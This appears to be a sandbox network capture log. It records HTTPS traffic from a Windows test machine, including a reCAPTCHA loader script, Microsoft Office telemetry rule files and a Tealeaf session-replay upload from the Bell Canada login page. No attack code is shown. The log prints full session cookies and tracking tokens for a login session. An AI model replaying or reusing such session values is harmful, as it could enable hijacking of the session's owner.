                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC629INData Raw: 36 39 30 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 45 3d 27 65 6e 74 65 72 70 72 69 73 65 27 2c 61 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 2c 67 72 3d 61 5b 45 5d 3d 61 5b 45 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 690/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['_
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC1058INData Raw: 6f 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 70 6f 2e 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 70 6f 2e 61 73 79 6e 63 3d 74 72 75 65 3b 20 70 6f 2e 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3b 76 61 72 20 76 3d 77 2e 6e 61 76 69 67 61 74 6f 72 2c 6d 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 6d 65 74 61 27 29 3b 6d 2e 68 74 74 70 45 71 75 69 76 3d 27 6f 72 69 67 69 6e 2d 74 72 69 61 6c 27 3b 6d 2e 63 6f 6e 74 65 6e 74 3d 27 41 2f 6b 61 72 67 54 46 79 6b 38 4d 52 35 75 65 72 61 76 63 7a 65 66 2f 77 49 6c 54 6b 62 56 6b 31 71 58 51 65 73 70 33 39 6e 56 2b 78 4e 45 43 50 64 4c 42 56 65 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63
                                                                                                                                                                                                                                                                                                                                      Data Ascii: o=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glc
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      90192.168.2.94987013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: e6885a93-401e-0078-5ec2-2a4d34000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131206Z-17c5cb586f6l54tjt07kuq05pc00000000pg000000003t49
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      91192.168.2.94986613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: bf07d5f0-e01e-0020-6ed9-2ade90000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131206Z-17c5cb586f6r59nt4rzfbx40ys00000001w0000000005dsg
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      92192.168.2.94986713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 432
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6741ff86-f01e-00aa-74b9-268521000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131206Z-16849878b78nzcqcd7bed2fb6n0000000220000000006mcx
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      93192.168.2.94986813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131206Z-16849878b78bjkl8dpep89pbgg00000008bg000000002ykv
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      94192.168.2.94986913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 0dbc9083-501e-0035-4fdd-2ac923000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131206Z-15b8d89586f5s5nz3ffrgxn5ac0000000a6000000000ebn2
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      95192.168.2.949877206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC3293OUTPOST /TeaLeaf/TealeafTarget.aspx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Content-Length: 25367
                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      X-Tealeaf-SyncXHR: false
                                                                                                                                                                                                                                                                                                                                      X-Tealeaf: device (UIC) Lib/6.2.0.2010
                                                                                                                                                                                                                                                                                                                                      X-Tealeaf-MessageTypes: 1,2,6,12,14,17
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                      X-Requested-From: tltWorker
                                                                                                                                                                                                                                                                                                                                      X-Tealeaf-SaaS-TLTSID: 759A09CF47C23CE7804C25098E01FFA8
                                                                                                                                                                                                                                                                                                                                      X-Requested-With: fetch
                                                                                                                                                                                                                                                                                                                                      X-TealeafType: GUI
                                                                                                                                                                                                                                                                                                                                      X-PageId: P.DXD9XLH5H8E5SWHWVVMPZPYCL6LP
                                                                                                                                                                                                                                                                                                                                      X-TeaLeaf-Page-Url: /Login
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/styles/tealeaf/tltWorker.js
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC16384OUTData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd db 72 db c8 96 28 f8 2b 68 bb 77 97 dd 47 20 71 e3 4d be ec 96 64 d9 f2 2e dd 2c c9 76 55 77 ed 61 80 60 92 84 05 02 2c 00 a4 24 57 55 c4 79 3f 31 31 cf 1d 31 31 af 13 33 2f f3 0f 33 7f 72 22 66 e2 7c c6 ac b5 32 01 e2 4e 50 a2 aa e4 5d 92 2d 91 48 e4 65 e5 ca 75 cf 85 c4 2f 4f a6 2c 08 cc 31 fb c4 fc c0 f6 dc 27 db 4f 54 bd a1 e0 bf 27 5b 4f 02 e6 db a6 73 3c 9f 0e 98 ff 64 5b c5 82 00 6b 05 4f b6 ff e3 97 27 f6 10 6a 9f 36 de fc f0 a6 f7 c3 e1 41 eb a0 bb df 3a ff 7c f0 f9 d3 a7 a3 d3 7f 3f fd 71 ef b0 7d 78 0a 7d 84 e6 e0 3d 56 7c fb e6 fc 33 76 19 9a 7e 78 61 4f 19 f4 d7 d1 15 bd ab e8 aa aa b7 3b 50 11 0a bf 7a 2e 3b 19 8d 02 16 3e d9 d6 0c 65 2b 82 8e 0f 18 de cc a0 99 b6 f5 c4 13 55 54 bd db ed 42 9f 96 cf 98 bb
                                                                                                                                                                                                                                                                                                                                      Data Ascii: r(+hwG qMd.,vUwa`,$WUy?11113/3r"f|2NP]-Heu/O,1'OT'[Os<d[kO'j6A:|?q}x}=V|3v~xaO;Pz.;>e+UTB
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC8983OUTData Raw: aa 9f b7 25 ae 1a 30 f2 a2 a1 2e cb ed 0e 55 87 fb 96 10 a3 3e c1 60 b5 d8 e1 68 35 28 44 42 2a 1f 8d a7 43 54 e6 60 9d 4f ba 85 a3 08 6d 9b 9e 24 34 71 78 1e 41 2b d5 2d 56 d6 c5 b6 89 30 8e c9 7e 40 a3 9f cc 4c b2 67 c8 88 c0 bc 03 27 22 50 8b 0c 9e 96 40 17 21 a3 e3 44 f7 22 d3 4e e3 1f 9d 7a 0c b7 8a 06 86 f1 4b a1 d7 23 82 a2 8d 17 35 f2 64 79 20 bb 23 c2 16 f8 d9 a1 60 86 21 62 3e 9d e8 17 34 93 9a 77 43 29 7a 1e 88 fa 71 24 fe 93 ce fd e1 3d 15 f7 40 30 74 40 3b 21 b8 c5 dd 09 44 bd 68 ff 03 a3 74 dd 38 80 dc 16 71 11 da b2 d9 53 db d0 0e 34 8c 46 9d 88 2f ed 05 df 1f 31 44 3c a7 13 fd 06 99 79 20 04 0b 59 a3 e9 d0 0d b2 66 79 18 a4 17 88 ad 04 ba c0 cf 68 7e 1d 72 8c f9 c6 88 ca b7 8c ce 15 0a 76 10 4c 04 40 1b 65 4e 14 d4 df e2 b5 31 80 24 62 41
                                                                                                                                                                                                                                                                                                                                      Data Ascii: %0.U>`h5(DB*CT`Om$4qxA+-V0~@Lg'"P@!D"NzK#5dy #`!b>4wC)zq$=@0t@;!Dht8qS4F/1D<y Yfyh~rvL@eN1$bA
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC3337INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache,no-cache
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; path=/;SameSite=Lax; secure; HttpOnly; SameSite=Lax; Secure
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
